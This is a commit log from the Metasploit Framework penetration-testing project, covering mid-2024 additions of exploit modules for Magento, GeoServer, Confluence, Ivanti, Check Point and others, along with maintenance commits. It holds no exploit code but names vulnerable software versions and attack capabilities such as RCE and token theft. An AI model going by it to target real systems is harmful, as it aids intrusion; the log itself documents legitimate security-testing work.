The start_service method now allows users to specify their SSL preferences directly through the opts parameter. If the ssl option is not provided in opts, it will default to the value in datastore['SSL'].

This change enhances the flexibility and usability of the start_service method, preventing unintended behavior when users need to control the SSL setting explicitly.

Closes #19329
2024-07-19 12:33:13 +02:00
Metasploit b5d89f3e11 automatic module_metadata_base.json update 2024-07-18 12:56:01 -05:00
Jack Heysel 6ad5ba36fd Land #19304, Add Magento XXE File Read Exploit
This adds an auxiliary module for an XXE which results in an arbirary
file in Magento which is being tracked as CVE-2024-34102
2024-07-18 10:32:03 -07:00
jheysel-r7 53afe2b28f Updated SRVHOST description in doc file 2024-07-18 12:44:06 -04:00
redwaysecurity.com d559a74c1d Removed dead code 2024-07-18 11:56:22 +02:00
redwaysecurity.com 5d9232cc39 It must fails on SRVHOST default configuration.
If srvhost is set to 0.0.0.0 the framework will attempt to automatically
set it to your default LHOST although that isn't always accessible by your
target.
2024-07-18 11:15:04 +02:00
Metasploit 219abdd9c6 Bump version of framework to 6.4.19 2024-07-18 03:33:57 -05:00
Metasploit caddd1b434 automatic module_metadata_base.json update 2024-07-18 02:08:59 -05:00
Spencer McIntyre 5886e69e92 Land #19327, Bump metasploit_payloads-mettle to 1.0.31
Bump metasploit_payloads-mettle to 1.0.31
2024-07-18 08:43:41 +02:00
Heyder Andrade 55e825bdca Update modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-07-18 07:36:48 +02:00
Heyder Andrade 400e628226 Update modules/auxiliary/gather/magento_xxe_cve_2024_34102.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-07-18 07:36:24 +02:00
redwaysecurity.com a5208e0c5f Moved module to auxiliary/gather 2024-07-17 18:47:02 +02:00
redwaysecurity.com 5e693dcbe7 Fix typo 2024-07-17 18:14:03 +02:00
redwaysecurity.com 236662ce37 Changed CheckCode returned value
As we're checking the version and not actually exploiting the vulnerability the check method should return CheckCode::Appears
2024-07-17 18:11:55 +02:00
redwaysecurity.com 8b9b8a2cf0 Gives the user a datastore option
The user can decide whether or not they want the loot to be stored on disk or printed to the console.
2024-07-17 18:09:46 +02:00
redwaysecurity.com 07c1d818a8 Cleaning dead code and addeding default case 2024-07-17 17:14:03 +02:00
redwaysecurity.com 16fefd9942 Turning off SSL datastore temporarily.
Briefly disable the SSL datastore option before starting the HTTP server to avoid spinning up an HTTPS server, which would cause the exploit to fail.
2024-07-17 16:44:50 +02:00
redwaysecurity.com 08de13fe01 Converting the version string
The version string needs to be converted to a Rex::Version object in order for the two values to be compared successfully.
2024-07-17 16:13:32 +02:00
h00die-gr3y 5459503dc6 updated module reference of openmediavault_cmd_exec 2024-07-16 16:04:14 +00:00
h00die-gr3y a9f8475bf5 moved module + doc to exploit/unix/webapp 2024-07-16 15:50:20 +00:00
dledda-r7 2dfe97673a Bump metasploit_payloads-mettle to 1.0.31 2024-07-16 11:47:14 -04:00
Christophe De La Fuente e9c511c979 Add documentation and some updates 2024-07-16 16:34:28 +02:00
Metasploit 6db63e80a8 automatic module_metadata_base.json update 2024-07-16 08:28:57 -05:00
adfoster-r7 2943f01d22 Land #19325, update geoserver_unauth_rce_cve_2024_36401 2024-07-16 14:06:20 +01:00
redwaysecurity.com 54a7ed1cfb Added check method
Signed-off-by: redwaysecurity.com <heyder@redwaysecurity.com>
2024-07-16 13:31:24 +02:00
redwaysecurity.com 173a244718 Added documentation
Signed-off-by: redwaysecurity.com <heyder@redwaysecurity.com>
2024-07-16 13:17:49 +02:00
Pierre Mauduit 8a0c65e603 Update geoserver_unauth_rce_cve_2024_36401.rb
looks like a copy/paste typo from another exploit
2024-07-16 11:20:35 +02:00
Jack Heysel cfd71e9c27 Land #19324, Add improvements to rcp_session lib
Updates rpc compatible modules to handle unknown sessions
2024-07-15 14:25:57 -07:00
Metasploit 0e7b9d3107 automatic module_metadata_base.json update 2024-07-15 08:27:29 -05:00
Spencer McIntyre 882a283ea9 Land #19322, Bump metasploit_payloads-mettle to 1.0.30
Bump metasploit_payloads-mettle to 1.0.30
2024-07-15 09:02:39 -04:00
adfoster-r7 604227fb4d Update rpc compatible modules to handle unknown sessions 2024-07-15 10:38:56 +01:00
Metasploit 1abe29e98c automatic module_metadata_base.json update 2024-07-12 13:31:47 -05:00
Jack Heysel f7449ea850 Land #19311, Add GeoServer unauth RCE module
This adds an exploit module for CVE-2024-36401, an unauthenticated RCE
vulnerability in GeoServer versions prior to 2.23.6, between version
2.24.0 and 2.24.3 and in version 2.25.0, 2.25.1.
2024-07-12 11:07:36 -07:00
jheysel-r7 c5dad68322 Remove comma after the last item of a hash 2024-07-12 13:38:59 -04:00
H00die.Gr3y 292c177b74 Apply suggestions from code review
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-07-12 19:20:46 +02:00
h00die 07cc3bbf74 Further updates to x11 2024-07-12 13:57:24 +00:00
h00die a93a6dddf9 Merge branch 'rapid7:master' into xspy 2024-07-12 06:49:52 -04:00
dledda-r7 5d1ee84cb0 Bump metasploit_payloads-mettle to 1.0.30 2024-07-12 05:17:19 -04:00
Jack Heysel 5d210b548b added windows support 2024-07-11 16:34:07 -07:00
h00die-gr3y 4e76068cea added armle architecture support 2024-07-11 21:42:45 +00:00
h00die-gr3y 92f6445856 added documentation 2024-07-11 21:24:50 +00:00
h00die 04f4990318 Further x11 updates 2024-07-11 18:28:50 +00:00
h00die-gr3y 1ee2131d8d update based on cgranleese-r7 review comments 2024-07-11 16:12:52 +00:00
h00die ea0d400e79 update x11 docs 2024-07-11 12:35:38 +00:00
h00die 05fb1d3eaa x11 library update 2024-07-11 12:34:49 +00:00
Metasploit 6283456164 Bump version of framework to 6.4.18 2024-07-11 03:34:02 -05:00
Metasploit 8849329d65 automatic module_metadata_base.json update 2024-07-10 20:50:17 -05:00
Jack Heysel daf0ce90f0 Land #19314, Add exploit for CVE-2024-21683
This adds an exploit for CVE-2024-21638 which is an authenticated RCE in
Atlassian Confluence affecting all versions prior to 7.17 and many
versions up to 8.9.0
2024-07-10 18:26:04 -07:00
jheysel-r7 f9bd079618 Apply suggestions from code review 2024-07-10 20:45:53 -04:00
h00die-gr3y 28d6ef92dd fourth release module 2024-07-10 21:44:28 +00:00
dwelch-r7 41dee56152 Land #19319, Pin FFI version 2024-07-10 16:06:38 +01:00
adfoster-r7 9c14536e08 Pin FFI version 2024-07-10 15:08:00 +01:00
h00die-gr3y 198f3f8d9b update based on review comments of jvoisin 2024-07-10 11:05:22 +00:00
adfoster-r7 dd0cf4baae Land #19315, remove duplicate word in wiki docs 2024-07-10 00:03:03 +01:00
h00die 74536b93d6 remove duplicate word 2024-07-09 18:02:31 -04:00
h00die-gr3y 92637c4293 third release module 2024-07-09 21:54:55 +00:00
remmons-r7 7746c8877e Add sysinfo Meterpreter output and target OS version numbers 2024-07-09 16:31:01 -05:00
remmons-r7 108e60ae4d Peer review suggestion to swap out fail_with for print_error
If the response to the code execution request isn't a 200, the module should error instead of fail. All versions tested returned 200s, but it's a great point that some Confluence versions might return a different status code but still pop a shell.
2024-07-09 16:23:25 -05:00
remmons-r7 abb02a91d5 Add suggested Appears/Safe change from peer review
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-07-09 16:16:41 -05:00
remmons-r7 0852fbfeb8 Remove two whitespaces that snuck in 2024-07-09 14:34:33 -05:00
remmons-r7 8ee90bf2c7 Adding module for CVE-2024-21683
This adds a module to exploit an authenticated admin-level Rhino script engine injection vulnerability for RCE in Atlassian Confluence.
2024-07-09 14:19:15 -05:00
remmons-r7 06da60cade Adding atlassian_confluence_rce_cve_2024_21683 documentation
Adding CVE-2024-21683 documentation, which includes both Windows and Linux examples.
2024-07-09 14:05:43 -05:00
Christophe De La Fuente 1abc42a873 Add module 2024-07-09 18:34:27 +02:00
adfoster-r7 745bb9caa7 Land #19301, Update setting up a developer environment documentation 2024-07-09 14:09:50 +01:00
Arne De Herdt cbdbb8e5ac Update docs/metasploit-framework.wiki/dev/Setting-Up-a-Metasploit-Development-Environment.md
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2024-07-09 13:27:06 +02:00
adeherdt-r7 1112ab5f64 MS-9451 Update Documentation
Updating the documentation to set up the developer environment using Docker.
2024-07-09 09:25:02 +02:00
Metasploit 7ad7b959ec automatic module_metadata_base.json update 2024-07-08 15:08:56 -05:00
Jack Heysel aabd9febb2 Land #19274, Ivanti EPM SQLi to RCE
This adds an exploit for CVE-2024-29824, an  unauthenticated SQLi
which can be used to obtain RCE in Ivanti Endpoint Manager 2022 SU5 and
prior
2024-07-08 12:52:34 -07:00
h00die-gr3y 702aff81ce second release module 2024-07-08 19:35:34 +00:00
Metasploit 39cc7437d7 automatic module_metadata_base.json update 2024-07-08 10:29:44 -05:00
Zach Goldman e0ccd8a040 Land #19312, Fix loading Mettle extensions 2024-07-08 11:05:12 -04:00
adfoster-r7 50142ff988 Fix loading Mettle extensions 2024-07-08 14:04:13 +01:00
h00die-gr3y 8e598acaeb first draft release 2024-07-08 06:53:16 +00:00
h00die-gr3y 2e1dfa62c1 One small change in check method 2024-07-05 06:55:37 +00:00
h00die-gr3y 7ad152694a Addressed two more review comments 2024-07-04 20:49:17 +00:00
h00die-gr3y 594de4681f Second release module addressing cdelafuente-r7 comments and added documentation 2024-07-04 20:31:02 +00:00
redwaysecurity.com d89df446bf WIP - added module for CVE-2024-34102
on-behalf-of: @redwaysecurity info@redwaysecurity.com
2024-07-04 16:24:39 +02:00
Metasploit e549e0ccf4 Bump version of framework to 6.4.17 2024-07-04 03:37:24 -05:00
dledda-r7 f7902c2826 Land #19295, MOVEit Transfer SFTP auth bypass 2024-07-04 04:27:50 -04:00
Metasploit cc46ad7ddd automatic module_metadata_base.json update 2024-07-03 13:47:21 -05:00
adfoster-r7 4909a43bf0 Land #19252, improve error handling for unhandled errors 2024-07-03 19:20:56 +01:00
Christophe De La Fuente df8f281d18 Land #19204, Zyxel VPN Series Pre-auth Command Injection 2024-07-03 20:14:39 +02:00
jheysel-r7 b67f05f50d Apply suggestions from code review 2024-07-03 13:51:50 -04:00
Jack Heysel 7e4c6ca028 Added code to print stdout of payloads without reverse connections 2024-07-03 09:36:36 -07:00
sfewer-r7 cb3966da7f reduce the nesting in read_file by 2 levels 2024-07-03 17:12:03 +01:00
Metasploit 29beac7f8c automatic module_metadata_base.json update 2024-07-03 10:54:49 -05:00
sfewer-r7 4ca2ce35eb use synchronous calls to open, read and close (as the async calls were not being waited on, so moving to the sync implmentations of these avoids that problem), thanks @cdelafuente-r7 :) 2024-07-03 16:38:31 +01:00
sfewer-r7 0b6d3057ca fix typos in comments 2024-07-03 16:36:15 +01:00
dledda-r7 1e0db9ec83 Land #10113, Azure CLI steal tokens post module. 2024-07-03 11:32:04 -04:00
Jack Heysel 1d602da6b5 Added space between command and stderr/stout redirection 2024-07-03 08:23:38 -07:00
sfewer-r7 9d5ea1f2b7 call sftp.close in an ensure block in case seomthing throws an excpetion. we probably dont *have* to do this (as teh SFTP session will be torn down either way), but it seems like best practise *to* so this. 2024-07-03 16:21:42 +01:00
sfewer-r7 e1916974a1 we can use glob rather than foreach to recursivly list the contents of a folder 2024-07-03 16:20:27 +01:00
Zach Goldman 4316d52b87 trim exception list 2024-07-03 09:48:27 -05:00
sfewer-r7 a55ee563c7 update LICENSE_GEMS to include the MIT license for net/sftp 2024-07-03 11:15:18 +01:00
sfewer-r7 ee960d2b5b I noticed some tests are failing on gitHub, looks like I need to update the Gemfile.lock, as the library net/sftp was added for this auxiliary module 2024-07-03 11:03:19 +01:00
Stephen Fewer 840da8d181 explicitly register an Opt::Proxies option
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2024-07-03 10:45:45 +01:00
Christophe De La Fuente 1264fe40ad Land #19285, Fix sysinfo fails when cwd in the implant is deleted 2024-07-02 18:57:50 +02:00
sfewer-r7 8422b4cf39 add in support to net/sftp for Metasploits pivot system, by using a new Rex::Socket::Tcp socket when creating the underlying SSH protocols socket. 2024-07-02 16:09:25 +01:00
dledda-r7 aa4529596c fix: minor fix; removing a blank line 2024-07-02 11:09:13 -04:00
sfewer-r7 ec32b76904 The RPORT we register as an option should be 22, not 80. We can also remove the DefaultOptions, RPORT is covered and SSL does not make sense here. 2024-07-02 15:55:09 +01:00
h00die-gr3y 562e93fe3b First release module 2024-07-02 14:54:04 +00:00
adfoster-r7 2b6cf16b39 Land #19297, improve redis scanner logic to handle no auth scenario 2024-07-02 13:46:01 +01:00
adeherdt-r7 c5717d42d6 MS-9457 Support NO_AUTH_REQUIRED
Support the `NO_AUTH_REQUIRED` condition and terminate the scan to avoid further unneeded attempts.
2024-07-02 14:09:01 +02:00
Zach Goldman eb81a786d1 replace uri unescape with new proper methods 2024-07-01 15:52:01 -05:00
sfewer-r7 0d7efcaabc add in AKB analysis link and fix some typos 2024-07-01 09:25:19 +01:00
Metasploit 27a63aa68d automatic module_metadata_base.json update 2024-06-28 10:27:03 -05:00
adfoster-r7 90ef017cfb Land #19289, Update apache_nifi_credentials algo regex 2024-06-28 15:59:24 +01:00
dwelch-r7 dc667dc67f Land #19287, Add login support for newer redis versions 2024-06-28 15:47:39 +01:00
h00die eb0933fc9a Update apache_nifi_credentials algo regex 2024-06-28 10:36:35 -04:00
adeherdt-r7 52142f280f MS-9454 Redis Scanner: Support versions
Updating the Redis Login Scanner to properly support all versions of Redis and their implementations to handle the `AUTH` command.
2024-06-28 15:25:49 +02:00
dledda-r7 f92ebb34ca fix: moved begin/rescue inside the update_session_info; added logging 2024-06-28 03:21:42 -04:00
h00die db0f11bfe4 Update azure_cli_creds.md 2024-06-27 10:45:42 -04:00
h00die 6dc1b6a6e4 fix slashes for linux on azure_cli 2024-06-27 10:45:05 -04:00
Metasploit e691f72170 Bump version of framework to 6.4.16 2024-06-27 03:34:27 -05:00
sfewer-r7 aff9e07f1f add in the aux gather module for CVE-2024-5806 2024-06-27 09:32:47 +01:00
sfewer-r7 493a45e0ba add in net-sftp as a required Gem, we need this to exploit CVE-2024-5806 2024-06-27 09:32:15 +01:00
adfoster-r7 9343a35f00 Land #19283, MS-9445 Fix Redis Service Reporting 2024-06-26 16:10:31 +01:00
dledda-r7 0659232e8f fix: fixed sysinfo fails when cwd in the implant is deleted 2024-06-26 09:16:22 -04:00
adeherdt-r7 51176e778c MS-9445 Fix Service Reporting
Preliminary pull request to resolve an issue with a service not being properly detected for Redis.

* Ensure service name is properly passed down when detecting vulnerabilities
* Ensure Redis properly detects no-auth requirements
2024-06-26 15:11:29 +02:00
Arne De Herdt 580e7fff4d Merge pull request #19284 from adfoster-r7/fix-redis-scanner-when-auth-enabled
Fix redis_login scanner when auth is enabled
2024-06-26 14:52:21 +02:00
adfoster-r7 afa973e05e Fix reids_login scanner when auth is enabled 2024-06-26 13:32:16 +01:00
Metasploit 4c81b39d76 automatic module_metadata_base.json update 2024-06-24 18:09:00 -05:00
Spencer McIntyre a5afdd6e04 Land #19205, Add MS-NRPC users enumeration module 2024-06-24 18:52:47 -04:00
Spencer McIntyre 858a2f8400 Fix rubocop issues 2024-06-24 18:21:49 -04:00
Spencer McIntyre 3794285715 Bump RubySMB to 3.3.9 2024-06-24 18:21:45 -04:00
h00die b4975f6a23 updates to azure cli creds 2024-06-24 17:06:04 -04:00
Jack Heysel 9cfaa2e69f Lowered rank and explained mock testing 2024-06-24 09:13:46 -07:00
Metasploit be11394758 automatic module_metadata_base.json update 2024-06-24 08:26:23 -05:00
Spencer McIntyre dc2adc0798 Land #19259, warn on weak meterpreter keys
Fixing meterpreter to support is_weak_key byte flag from mettle
2024-06-24 08:58:40 -04:00
Metasploit f26393256b automatic module_metadata_base.json update 2024-06-24 07:06:04 -05:00
Christophe De La Fuente 24fa34e7b9 Land #19188, Netis MW5360 unauthenticated RCE [CVE-2024-22729] 2024-06-24 13:40:51 +02:00
dledda-r7 09debbb93f fix: fixed rubocop issue 2024-06-24 05:33:30 -04:00
dledda-r7 2de112891c fix: fixed payload cached size 2024-06-24 05:21:07 -04:00
dledda-r7 91f4741508 Update metasploit_payloads-mettle gem to 1.0.28 2024-06-21 11:14:33 -04:00
dwelch-r7 b4c2abad5f Land #19275, Add adeherdt-r7 to the mail map 2024-06-21 14:22:14 +01:00
adeherdt-r7 8b5c8bcb3a Add adeherdt-r7 to the mail map
Updating the mailmap.
2024-06-21 15:14:34 +02:00
Christophe De La Fuente 2f238fcd24 Code review 2024-06-21 10:13:08 +02:00
dledda-r7 8a432fb292 fix: default is_weak_key is nil; handling of empty key_dec_data 2024-06-21 04:00:02 -04:00
Christophe De La Fuente ecb628eaab Add module and documentation 2024-06-20 15:30:54 +02:00
adfoster-r7 db94ad16d6 Land #19270, Update Github runners 2024-06-20 11:22:09 +01:00
Metasploit b710bcb10a automatic module_metadata_base.json update 2024-06-20 05:06:23 -05:00
adfoster-r7 2e51b37f1c Land #19267, Escape LDAP query string filters 2024-06-20 10:42:19 +01:00
Metasploit bccad774fd Bump version of framework to 6.4.15 2024-06-20 03:37:28 -05:00
adfoster-r7 3f39b09211 Update Github runners 2024-06-20 00:11:12 +01:00
Metasploit 03a2aea099 automatic module_metadata_base.json update 2024-06-19 13:11:17 -05:00
Jack Heysel bae70a4b98 Land #19255, Add SolarWinds Serv-U aux module
This module exploits an unauthenticated file read vulnerability, due to
directory traversal, affecting SolarWinds Serv-U FTP Server 15.4, Serv-U
Gateway 15.4, and Serv-U MFT Server 15.4. All versions prior to the
vendor supplied hotfix "15.4.2 Hotfix 2" (version 15.4.2.157) are
affected.
2024-06-19 10:54:45 -07:00
jheysel-r7 06c0c7392f Rubocop add space after comma 2024-06-19 13:20:52 -04:00
jheysel-r7 fd9c74766d Update Windows TARGETFILE matching 2024-06-19 13:15:35 -04:00
Spencer McIntyre a6fd6defcb Escape LDAP query strings 2024-06-18 17:47:56 -04:00
Metasploit 5f68d93809 automatic module_metadata_base.json update 2024-06-18 16:25:03 -05:00
Spencer McIntyre 08575d0895 Land #19176, Add missing Arch parameter
Adding Arch parameter to dnn_cookie_deserialization_rce module
2024-06-18 17:07:08 -04:00
Metasploit 5992dcebc1 automatic module_metadata_base.json update 2024-06-18 15:09:54 -05:00
Spencer McIntyre 0110ed2b2a Land #19253, Corrected a mistaken CVE
Corrected a mistaken CVE-ID in exploit references.
2024-06-18 15:52:55 -04:00
aaron 94dca16cf7 Removing change from auto-generated file. Change is now ONLY in module file. 2024-06-18 15:16:56 -04:00
Metasploit 3c75e3c891 automatic module_metadata_base.json update 2024-06-18 12:09:04 -05:00
Jack Heysel c1826cd2f3 Land #18829, Allow multiple HttpServers in module
Adding multiple HttpServer services in a module is sometimes complex
since they share the same methods. This usually this causes issues where
on_request_uri needs to be overridden to handle requests coming from
each service. This updates the cmdstager and the Java HTTP ClassLoader
mixins, since these are commonly used in the same module. This also
updates the manageengine_servicedesk_plus_saml_rce_cve_2022_47966 module
to make use of these new changes
2024-06-18 09:51:38 -07:00
sud0Ru 5ec4f25e95 Class variable changed back to an instance variable 2024-06-18 17:57:54 +03:00
sud0Ru 03a1aee487 Delete old module 2024-06-18 17:53:32 +03:00
sud0Ru a5a296aef7 Delete old documentation file 2024-06-18 17:52:33 +03:00
Spencer McIntyre 29307b1321 Appease msftidy 2024-06-18 09:23:41 -04:00
Metasploit 223c6feadb automatic module_metadata_base.json update 2024-06-17 13:45:05 -05:00
Jack Heysel dc70aa0896 Land #19247, PHP CGI Arg injection RCE
XAMPP installs running on Windows system configured to use Japanese or
Chinese (simplified or traditional) locales are vulnerable to a PHP CGI
argument injection vulnerability. This exploit module returns a session
running in the context of the Administrator user
2024-06-17 11:27:38 -07:00
Metasploit e412f95116 automatic module_metadata_base.json update 2024-06-17 10:39:13 -05:00
Spencer McIntyre 818d67b3ee Land #19249, Apache OFBiz Directory Traversal RCE
Apache OFBiz Directory Traversal RCE [CVE-2024-32113]
2024-06-17 11:22:44 -04:00
dledda-r7 80e942b76d fix: better implementation of negotiate_tlv_encryption 2024-06-17 10:57:17 -04:00
Metasploit e2516bd494 automatic module_metadata_base.json update 2024-06-17 04:39:30 -05:00
dwelch-r7 17a6d443b5 Land #19260, Update windows acceptance tests 2024-06-17 10:19:25 +01:00
dwelch-r7 39de7ca357 Land #19257, Update docs ruby version 2024-06-17 10:17:40 +01:00
h00die db338e364c fix consolehost_history search 2024-06-16 20:33:18 -04:00
h00die 434455757d tested azure_cli_creds against data files 2024-06-16 20:25:47 -04:00
Jack Heysel e14dd93d6f Rebased encoder fix, removed PS paylaod dependency 2024-06-14 16:59:55 -07:00
Jack Heysel ade11a5a4b Added default options fixed Verification Steps 2024-06-14 16:41:12 -07:00
Jack Heysel 1dfd5da51e Apache OFBiz Dir Traversal RCE 2024-06-14 16:41:12 -07:00
Metasploit b6d2fb654b automatic module_metadata_base.json update 2024-06-14 17:59:00 -05:00
Jack Heysel 90bb6b9b01 Land #19261, Fix powershell_base64 encoder
The powershell_base64 encoder was changed to use the Windows start
command, which broke some payload after they were encoded. This was
because when using start, the argument can not be a string of commands
joined by & which is required by the fetch payloads. This fixes that
issue by removing the start command from the encoder
2024-06-14 15:41:22 -07:00
Metasploit c8dc3ed661 automatic module_metadata_base.json update 2024-06-14 13:51:49 -05:00
Jack Heysel 178bb3e085 Land #19229, Junos OS PHPRC module enhancement
The junos_phprc_auto_prepend_file module used to depend on having a user
authenticated to the J-Web application to steal the necessary session
tokens in order to exploit. With this enhancement the module will now
create a session if one doesnt exist. Also it adds datastore options to
change the hash format to be compatible with older version as well an
option to attempt to set ssh root login to true before attempting to
establish a root ssh session
2024-06-14 11:35:15 -07:00
Jack Heysel 1bb95acd12 Updated documentation 2024-06-14 11:02:31 -07:00
dledda-r7 1a8746f076 fix: updated warning messages, inverted is_weak_key logic 2024-06-14 10:19:56 -04:00
Christophe De La Fuente 8fc6e20cec Update other modules to use java_class_loader_start_service and cmdstager_start_service 2024-06-14 12:57:42 +02:00
softScheck d68a57f649 junos_ssh_jail: replaced asdf with alphanumeric random string 2024-06-14 10:45:19 +02:00
softScheck 0a34168906 junos_ssh_jail: revert to old get_csrf_token method with securephpsessid added 2024-06-14 10:38:24 +02:00
Spencer McIntyre 111d329609 Fix the powershell_base64 encoder 2024-06-13 15:46:02 -04:00
Metasploit de3e92957c automatic module_metadata_base.json update 2024-06-13 13:29:14 -05:00
Jack Heysel 35d161be91 Land #19221, CheckPoint Security Gateway file read
This module leverages an unauthenticated arbitrary root file read
vulnerability for Check Point Security Gateway appliances. When the
IPSec VPN or Mobile Access blades are enabled on affected devices,
traversal payloads can be used to read any files on the local file
system. This vulnerability is tracked as CVE-2024-24919.
2024-06-13 11:03:58 -07:00
adfoster-r7 30c9ea2064 Update windows acceptance tests 2024-06-13 18:05:30 +01:00
Jack Heysel 1abe3b9a26 Add detail to setup instructions 2024-06-13 08:57:24 -07:00
Christophe De La Fuente 70b21ff3f2 Update manageengine_servicedesk_plus_saml_rce_cve_2022_47966 module 2024-06-13 16:53:07 +02:00
Christophe De La Fuente 764dc89997 Update Java::HTTP::ClassLoader and CmdStager::HTTP
- Add specific #on_request_uri, #start_service and #resource_uri methods with distinct names
2024-06-13 16:39:24 +02:00
Stephen Fewer b98e0b8cfc STORE_LOOT is OptBool, so will be either true or false, we can remove equality check here.
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-06-13 15:13:53 +01:00
Stephen Fewer fb44c7e6ff fix typo in module description
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-06-13 15:10:14 +01:00
Stephen Fewer d7531ef74c fix typo in documentation
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-06-13 15:09:56 +01:00
dledda-r7 acfaf52611 feat(meterpreter): display a warning when a weak encryption aes_key is used. skip module loading if encryption is weak. 2024-06-13 09:30:17 -04:00
remmons-r7 297cbb2e8e Single quotes to double quotes for string interpolation
Secondary commit from peer review suggestion.
2024-06-13 08:14:35 -05:00
remmons-r7 c7d40bc6f1 Updating language around file in documentation
From peer review suggestion.

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-06-13 08:08:09 -05:00
remmons-r7 dc028fdb1e Enable SSL by default
From peer review suggestion.

Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2024-06-13 08:07:18 -05:00
remmons-r7 eb51d7be45 Change Failure::Unknown to Failure::UnexpectedReply
From peer review suggestion.

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-06-13 08:06:25 -05:00
dwelch-r7 906a3486dc Land #19258, Update linting Ruby version 2024-06-13 13:31:59 +01:00
adfoster-r7 f8eba7c1d9 Update linting Ruby version 2024-06-13 13:16:13 +01:00
adfoster-r7 759f331071 Update docs ruby version 2024-06-13 13:10:26 +01:00
dwelch-r7 d31d282a73 Land #19256, Fix warnings in acceptance tests 2024-06-13 11:20:22 +01:00
adfoster-r7 b48fbc6e00 Fix warnings in acceptance tests 2024-06-13 11:10:30 +01:00
sfewer-r7 7e37ca5d1a add in link to AKB analysis 2024-06-13 10:22:33 +01:00
sfewer-r7 1d1c37bf44 add in documentation for options 2024-06-13 10:19:53 +01:00
Metasploit f5aea8c11b Bump version of framework to 6.4.14 2024-06-13 03:39:08 -05:00
Metasploit d9bfcd464d automatic module_metadata_base.json update 2024-06-12 17:59:03 -05:00
Jack Heysel b9b638dd83 Land #19196, Cacti import package RCE
This exploit module leverages an arbitrary file write vulnerability
(CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It
abuses the Import Packages feature to upload a specially crafted package
that embeds a PHP file.
2024-06-12 15:43:46 -07:00
Metasploit 7031e0c7d7 automatic module_metadata_base.json update 2024-06-12 16:17:01 -05:00
bwatters c768b1e1d4 Land #19243, Add exploit for CVE-2024-1800 (Telerik Report Deserialization RCE)
Merge branch 'land-19243' into upstream-master
2024-06-12 15:59:07 -05:00
h00die-gr3y 4e26704d73 Update addressing cdelafuente-r7 comments 2024-06-12 18:57:29 +00:00
Christophe De La Fuente 45815a4cb5 Code review 2024-06-12 19:47:02 +02:00
sfewer-r7 835ff4453a store loot as application/octet-stream if its not ASCII 2024-06-12 17:50:27 +01:00
sfewer-r7 7617a53993 add documentation 2024-06-12 17:45:11 +01:00
Zach Goldman f3ad8a4737 Land #19225, Add android link to issues template 2024-06-12 12:33:23 -04:00
Metasploit e688226136 automatic module_metadata_base.json update 2024-06-12 11:07:22 -05:00
remmons-r7 a18dc69cbc Remove ISO download link from documentation
Since Check Point has swapped out the download link on this page for a patched version, the link has been removed entirely.
2024-06-12 11:04:24 -05:00
Zach Goldman f67526e248 Land #19223, wp_ajax_load_more_file_upload.rb : Updated original author 2024-06-12 11:51:03 -04:00
sfewer-r7 043d3231a6 add the serv-u aux module 2024-06-12 16:25:09 +01:00
Spencer McIntyre 18fe758416 Finish up and document the deserialization RCE 2024-06-12 08:58:37 -04:00
Spencer McIntyre cac5863e75 Update the exploit module to use the scanner 2024-06-12 08:58:37 -04:00
Spencer McIntyre 0e1e6c4fb2 Exploit improvements
* Delete the report the exploit creates
* Report credentials that are used to authenticate
* Use the specified username and password if provided
2024-06-12 08:58:37 -04:00
Spencer McIntyre c120a30ba4 Enumerate and select a random category 2024-06-12 08:58:37 -04:00
Spencer McIntyre b8d3cd6708 Initial module for CVE-2024-4358 2024-06-12 08:58:37 -04:00
softScheck 8a3262ae6c junos_ssh_jail: style and formatting rubocop 2024-06-12 12:14:36 +02:00
Metasploit 949ce3e894 automatic module_metadata_base.json update 2024-06-11 17:03:55 -05:00
bwatters 5b4e3f009d Land #19242, Add exploit for CVE-2024-4358 (Telerik Report Server Auth Bypass)
Merge branch 'land-19242' into upstream-master
2024-06-11 16:47:12 -05:00
aaron f49b9ea6cf Corrected CVE in module file as well. 2024-06-11 17:35:39 -04:00
aaron e1086e0aef Corrected mistaken CVE-ID in exploit references. 2024-06-11 15:37:12 -04:00
Zach Goldman a511729dce add explicit error handling to base login scanner 2024-06-11 13:01:08 -05:00
Metasploit 13fc954381 automatic module_metadata_base.json update 2024-06-11 12:39:00 -05:00
bwatters f2027784cf Land #19240, Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)
Merge branch 'land-19240' into upstream-master
2024-06-11 12:22:29 -05:00
Metasploit adeefd3ffe automatic module_metadata_base.json update 2024-06-11 10:54:10 -05:00
adfoster-r7 d07f64eb7f Land #19239, update Zoomeye module 2024-06-11 16:28:02 +01:00
Stephen Fewer ab0079c0ee Update modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb
improve documentation guidance to mention upgrading to a newer supported version (as 2.x is no longer supported)

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-06-11 16:26:04 +01:00
Stephen Fewer 2d63038196 Update documentation/modules/exploit/windows/http/rejetto_hfs_rce_cve_2024_23692.md
fix a typo in the documentation.

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2024-06-11 16:23:56 +01:00
Simon Janusz f5a2c6b3d5 Land #19251, Reintroduce windows acceptance tests 2024-06-11 13:06:07 +01:00
Metasploit 247642a516 automatic module_metadata_base.json update 2024-06-11 06:20:14 -05:00
cgranleese-r7 1077d4b0b0 Land #19191, Support Ruby 3.4.0-preview1 2024-06-11 11:57:45 +01:00
e2002e abb83fcdb6 fix several pages dork func. 2024-06-11 05:43:53 +02:00
Metasploit 14f88ce8ea automatic module_metadata_base.json update 2024-06-10 16:58:09 -05:00
Jack Heysel 9bbb82ab55 Land #18998, VSCode exploit for ipynb integration
VSCode allows users open a Jypiter notebook (.ipynb) file. Versions
